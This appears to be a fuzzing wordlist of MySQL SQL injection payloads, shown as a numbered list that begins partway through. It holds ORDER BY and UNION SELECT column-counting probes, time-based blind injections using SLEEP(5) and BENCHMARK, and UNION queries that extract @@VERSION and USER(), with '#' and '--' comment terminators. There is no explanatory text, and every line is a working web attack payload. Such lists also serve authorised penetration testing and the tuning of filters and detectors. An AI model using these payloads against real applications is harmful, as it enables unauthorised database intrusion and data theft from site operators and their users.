12 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
13 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
14 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
15 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
16 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
17 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
18 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
19 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
20 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
21 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
22 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
23 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
24 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
25 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
26 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
27 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
28 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
29 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
30 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
31 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
32 | ORDER BY SLEEP(5)#
33 | ORDER BY 1,SLEEP(5)#
34 | ORDER BY 1,SLEEP(5),3#
35 | ORDER BY 1,SLEEP(5),3,4#
36 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
37 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
38 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
39 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
40 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
41 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
42 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
43 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
44 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
45 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
46 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
47 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
48 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
49 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
50 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
51 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
52 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
53 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
54 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
55 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
56 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
57 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
58 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
59 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
60 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
61 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
62 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
63 | ORDER BY SLEEP(5)--
64 | ORDER BY 1,SLEEP(5)--
65 | ORDER BY 1,SLEEP(5),3--
66 | ORDER BY 1,SLEEP(5),3,4--
67 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
68 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
69 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
70 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
71 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
72 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
73 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
74 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
75 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
76 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
77 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
78 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
79 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
80 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
81 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
82 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
83 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
84 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
85 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
86 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
87 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
88 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
89 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
90 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
91 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
92 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
93 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
94 | UNION ALL SELECT 1
95 | UNION ALL SELECT 1,2
96 | UNION ALL SELECT 1,2,3
97 | UNION ALL SELECT 1,2,3,4
98 | UNION ALL SELECT 1,2,3,4,5
99 | UNION ALL SELECT 1,2,3,4,5,6
100 | UNION ALL SELECT 1,2,3,4,5,6,7
101 | UNION ALL SELECT 1,2,3,4,5,6,7,8
102 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9
103 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
104 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
105 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
106 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
107 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
108 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
109 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
110 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
111 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
112 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
113 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
114 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
115 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
116 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
117 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
118 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
119 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
120 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
121 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
122 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
123 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
124 | UNION ALL SELECT 1#
125 | UNION ALL SELECT 1,2#
126 | UNION ALL SELECT 1,2,3#
127 | UNION ALL SELECT 1,2,3,4#
128 | UNION ALL SELECT 1,2,3,4,5#
129 | UNION ALL SELECT 1,2,3,4,5,6#
130 | UNION ALL SELECT 1,2,3,4,5,6,7#
131 | UNION ALL SELECT 1,2,3,4,5,6,7,8#
132 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
133 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
134 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
135 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
136 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
137 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
138 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
139 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
140 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
141 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
142 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
143 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
144 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
145 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
146 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
147 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
148 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
149 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
150 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
151 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
152 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
153 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
154 | UNION ALL SELECT 1--
155 | UNION ALL SELECT 1,2--
156 | UNION ALL SELECT 1,2,3--
157 | UNION ALL SELECT 1,2,3,4--
158 | UNION ALL SELECT 1,2,3,4,5--
159 | UNION ALL SELECT 1,2,3,4,5,6--
160 | UNION ALL SELECT 1,2,3,4,5,6,7--
161 | UNION ALL SELECT 1,2,3,4,5,6,7,8--
162 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
163 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
164 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
165 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
166 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
167 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
168 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
169 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
170 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
171 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
172 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
173 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
174 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
175 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
176 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
177 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
178 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
179 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
180 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
181 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
182 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
183 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
184 | UNION SELECT @@VERSION,SLEEP(5),3
185 | UNION SELECT @@VERSION,SLEEP(5),USER(),4
186 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
187 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
188 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
189 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
190 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
191 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
192 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
193 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
194 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
195 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
196 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
197 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
198 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
199 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
200 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
201 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
202 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
203 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
204 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
205 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
206 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
207 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
208 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
209 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
210 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
211 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
212 | UNION SELECT @@VERSION,SLEEP(5),"'3
213 | UNION SELECT @@VERSION,SLEEP(5),"'3'"#
214 | UNION SELECT @@VERSION,SLEEP(5),USER(),4#
215 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
216 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
217 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
218 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
219 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
220 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
221 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
222 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
223 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
224 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
225 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
226 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
227 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
228 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
229 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
230 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
231 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
232 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
233 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
234 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
235 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
236 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
237 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
238 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
239 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
240 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
241 | UNION ALL SELECT USER()--
242 | UNION ALL SELECT SLEEP(5)--
243 | UNION ALL SELECT USER(),SLEEP(5)--
244 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
245 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
246 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
247 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
248 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
249 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
250 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
251 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
252 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
253 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
254 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
255 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
256 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
257 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
258 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
259 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
260 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
